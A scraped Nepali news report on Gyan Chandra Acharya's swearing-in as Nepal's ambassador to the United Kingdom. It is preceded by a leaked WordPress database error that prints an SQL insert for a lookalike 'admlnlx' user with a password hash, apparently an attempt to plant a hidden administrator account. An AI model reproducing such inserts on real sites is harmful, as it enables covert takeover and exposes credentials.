WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeCH5CtlvpDtPowzqFFRzZjqn1fFiX.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:14:10', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । राष्ट्रपति विद्यादेवी भण्डारीसमक्ष संयुक्त अधिराज्यका लागि नेपालको आवासीय राजदूत पदमा नियुक्त हुनुभएका ज्ञानचन्द्र आचार्यले पद तथा गोपनीयताको सपथ लिएको छ ।
राष्ट्रपतिको कार्यालय, शीतलनिवास महाराजगञ्जमा आज भएको समारोहमा राजदूत आचार्यले सपथ लिएको हो । त्यसअवसरमा परराष्ट्रमन्त्री डा नारायण खड्कालगायत नेपाल सरकारका उच्चपदस्थ अधिकारीहरुको उपस्थिति थियो ।
संयुक्त राष्ट्रसङ्घका लागि नेपालको स्थायी प्रतिनिधि हुँदै सोही विश्व संस्थाको उपमहासचिवको जिम्मेवारीसमेत सम्हाल्नुभएका पूर्वपरराष्ट्र सचिव आचार्यलाई मन्त्रिपरिषद्को सिफारिसमा गत माघ १४ गते राष्ट्रपतिले राजदूतमा नियुक्त गरेको थियो । रासस